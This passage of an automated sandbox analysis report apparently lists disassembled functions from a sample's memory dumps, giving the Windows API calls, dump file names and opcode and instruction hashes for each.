                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3486229058-0
                                                                                                                                                        • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                        • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                        • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                        • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExchangeInterlocked
                                                                                                                                                        • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                        • API String ID: 367298776-2876428247
                                                                                                                                                        • Opcode ID: 49d22ef3c92ac239a5687d4f94e176cb352ecd3f29265485bb5c781d6b7b6e4f
                                                                                                                                                        • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                        • Opcode Fuzzy Hash: 49d22ef3c92ac239a5687d4f94e176cb352ecd3f29265485bb5c781d6b7b6e4f
                                                                                                                                                        • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                        APIs
                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0079E960
                                                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0079EA6E
                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0079EBC0
                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0079EBDB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                        • API String ID: 2751267872-393685449
                                                                                                                                                        • Opcode ID: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
                                                                                                                                                        • Instruction ID: f9205ae31db05b9c3e77d0985b0ed2a32128f774b51f4989d9f1137d4a0a37b6
                                                                                                                                                        • Opcode Fuzzy Hash: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
                                                                                                                                                        • Instruction Fuzzy Hash: A3B15C71800209EFCF29DFA4E8859AEBBB5FF14310F14455AE815AB212D739EE51CF92
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2801635615-0
                                                                                                                                                        • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                        • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                        • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                        • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                        • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                        • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                        • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                        APIs
                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0079D977
                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0079D97F
                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0079DA08
                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0079DA33
                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0079DA88
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                        • String ID: csm
                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                        • Opcode ID: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                        • Instruction ID: e60fa94935fac86d4f2411bee0f06bae9fa08a52f082d528d61211fb7b327bd8
                                                                                                                                                        • Opcode Fuzzy Hash: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                        • Instruction Fuzzy Hash: 8B41D634A04208DFCF20DF68E885A9E7BB5FF45324F14C155E9196B392D739AD11CB91
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: localhost
                                                                                                                                                        • API String ID: 0-2663516195
                                                                                                                                                        • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                        • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                        • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                        • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timetime
                                                                                                                                                        • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                        • API String ID: 17336451-2178600047
                                                                                                                                                        • Opcode ID: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                        • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                        • Opcode Fuzzy Hash: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                        • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                        APIs
                                                                                                                                                        • timeKillEvent.WINMM(?,?,?,00000000,?,0041D4A9), ref: 004D8B13
                                                                                                                                                        • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                        • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                        • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                        • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                        • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3030913982-0
                                                                                                                                                        • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                        • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                        • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                        • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,00000000,00000008,?,?,00000008,00000000,?), ref: 004CF94E
                                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000008,?,?,00000008,00000000,?,?,00000008,00000000), ref: 004CF99D
                                                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: \\?\
                                                                                                                                                        • API String ID: 823142352-4282027825
                                                                                                                                                        • Opcode ID: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                        • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                        • Opcode Fuzzy Hash: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                        • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                          • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,0015381C,?,004DD732), ref: 004FA76A
                                                                                                                                                          • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                          • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                          • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                        • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                        • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                        • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long$Create
                                                                                                                                                        • String ID: Dummy$STATIC
                                                                                                                                                        • API String ID: 1733017098-132613206
                                                                                                                                                        • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                        • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                        • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                        • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
